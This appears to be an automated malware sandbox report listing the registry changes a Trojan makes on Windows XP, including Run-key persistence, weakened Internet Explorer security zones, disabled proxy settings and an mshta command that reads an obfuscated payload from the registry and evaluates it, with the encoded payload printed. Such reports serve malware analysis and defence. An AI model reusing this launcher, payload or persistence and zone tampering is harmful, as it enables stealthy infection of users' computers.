[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"
The process PSCustomSetupUtil.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 6F A9 B0 A7 AE 8D BE 65 6F 49 17 34 8D 94 59"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "50 1F 2E EC C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"
The process PSCustomSetupUtil.exe:2756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF DE BD AC A3 7B C3 9F 08 23 B7 B3 CE 13 89 84"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B6 52 D5 F1 C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"
The process PSCustomSetupUtil.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B F9 C7 AD D8 1B AF BD 93 88 BF 61 68 CB 6D 29"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 7B 06 EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"
The process PSCustomSetupUtil.exe:3988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 89 13 3E 73 E2 8E 0C 07 8E 26 5D 35 1C F8 D8"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "0C 66 31 EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"
The process PSCustomSetupUtil.exe:648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 68 5F 51 14 D9 51 96 3A 31 86 F4 E9 60 71 A9"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "1A E7 9A ED C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"
The process PSCustomSetupUtil.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 39 2E 44 A3 6A 94 2D 7E 76 57 C6 5F 88 27 67"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "16 79 EA EC C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"
The process UUPPHBZOfNIWNOEBZBhdR.exe:1076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 9E 37 10 C1 74 23 03 88 95 BF DE 91 27 AF A6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process regsvr32.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 5F 76 7B 4B 13 49 BA 65 33 5E 09 DF 5D 2D 6E"
The process regsvr32.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\342FCEDB45FFC2E0857]
"8BDCC7915048BC66" = "8BDCC7915048BC66"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"
[HKLM\SOFTWARE\trss]
"slfdbbjs" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\57A7188966691D52E6]
"55373F2BD9F90CD0E10" = "55373F2BD9F90CD0E10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 8A 0A 92 65 29 55 49 EC E5 60 DB 6D 0D 46 8E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\trss]
"slfdbbjs" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\57A7188966691D52E6]
[HKLM\SOFTWARE\342FCEDB45FFC2E0857]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\342FCEDB45FFC2E0857]
"8BDCC7915048BC66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"
[HKLM\SOFTWARE\57A7188966691D52E6]
"55373F2BD9F90CD0E10"
The process regsvr32.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 F2 71 BE 52 2D DF A2 16 99 96 E0 AF D4 CD 5A"
The process regsvr32.exe:324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\trss]
"uxjnqxthu" = "CB153804BB053A10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"
[HKCU\Software\trss]
"qcwxvpdn" = "1"
"kftbaigakf" = "1467068473"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\trss]
"tmmhg" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\trss]
"kftbaigakf" = "1467068473"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\trss]
"lbkg" = "CkfRswnkRLwfKcdQ8zjDJDq=FWpTjLsGn7KQi7eiWqjoqY6pYhWMDlpSTIuYtT;MFiWabOkc9RknuKjoQ=QfzT50g1se5gKdDEHBiQMHELsGYBqv3HxbcvOJZ9XmKN;q3zngxfCSKoNllrC8rz=f3CuLZpDTvD3ptMPVqTXR;Ojp4wlmWksCFsm9sZlOuZ=sJBjHT9V66LtZJsyDyX;rKAz2dVkfESbRWuahyohPamA4=h4pprvtE2qSzCD4v6AvdoChpF;R0a0U=2E3B050107352D73191936350D146024560B6459323730240778563A60203C14281B025911062E2634303C7246012B063908121C72390F0D2A1A112776780D5E257E3F210B1501292B3D57460D62101F3D78561B211F2832260E04421F18272E182C08627E1F59031C092A500F2504500C3A183E12201A5D6E684E1D51312A2F0700677131240E3E26041B183F3F1806002B250E58072D253F0E316D593A3F5B0121552879253F6E1F51491D030B047D22220C14262C163B2B085D747717031B0F21494D09735E333F073F7D430C0E05113015526F25040B3E2A302239713C60793E4A2F1D347B73060700505C321A26310E626030272E3B0328155C07150E280616250E581A02001C6C16464533300A3D69083D0A7A640F03290B0335322960260D0241170A1C36251D4252373C476E79011A5A663603005F02415119502D2903192A57463C0B66022E120B070F205D2F003506001223086525033F457D270A0A2E5A732D63320D3E163F1835323D2338391301"
[HKCU\Software\trss]
"zzpziqo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\trss]
"lbkg" = "CkfRswnkRLwfKcdQ8zjDJDq=FWpTjLsGn7KQi7eiWqjoqY6pYhWMDlpSTIuYtT;MFiWabOkc9RknuKjoQ=QfzT50g1se5gKdDEHBiQMHELsGYBqv3HxbcvOJZ9XmKN;q3zngxfCSKoNllrC8rz=f3CuLZpDTvD3ptMPVqTXR;Ojp4wlmWksCFsm9sZlOuZ=sJBjHT9V66LtZJsyDyX;rKAz2dVkfESbRWuahyohPamA4=h4pprvtE2qSzCD4v6AvdoChpF;R0a0U=2E3B050107352D73191936350D146024560B6459323730240778563A60203C14281B025911062E2634303C7246012B063908121C72390F0D2A1A112776780D5E257E3F210B1501292B3D57460D62101F3D78561B211F2832260E04421F18272E182C08627E1F59031C092A500F2504500C3A183E12201A5D6E684E1D51312A2F0700677131240E3E26041B183F3F1806002B250E58072D253F0E316D593A3F5B0121552879253F6E1F51491D030B047D22220C14262C163B2B085D747717031B0F21494D09735E333F073F7D430C0E05113015526F25040B3E2A302239713C60793E4A2F1D347B73060700505C321A26310E626030272E3B0328155C07150E280616250E581A02001C6C16464533300A3D69083D0A7A640F03290B0335322960260D0241170A1C36251D4252373C476E79011A5A663603005F02415119502D2903192A57463C0B66022E120B070F205D2F003506001223086525033F457D270A0A2E5A732D63320D3E163F1835323D2338391301"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\trss]
"divhsrmodi" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Classes\ecb437\shell\open\command]
"(Default)" = "mshta javascript:E9uj6YSw=UqJyj5RF;t1F=new ActiveXObject(WScript.Shell);DQ6XcBejI1=hkHKd6G4;cBI9Z=t1F.RegRead(HKCU\\software\\trss\\lbkg);GBqq4HH=9nLHo8;eval(cBI9Z);EsCPMo71=2h;"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\trss]
"divhsrmodi" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"
[HKLM\SOFTWARE\trss]
"slfdbbjs" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKCU\Software\Classes\.48198b5]
"(Default)" = "ecb437"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"
[HKCU\Software\trss]
"uxjnqxthu" = "CB153804BB053A10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 23 53 A4 EE 91 D0 B2 DD 99 E8 15 95 0A 5A 62"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"
[HKLM\SOFTWARE\trss]
"zzpziqo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe"
[HKCU\Software\trss]
"slfdbbjs" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\trss]
"tmmhg" = ""
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKLM\SOFTWARE\trss]
"qcwxvpdn" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exec"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
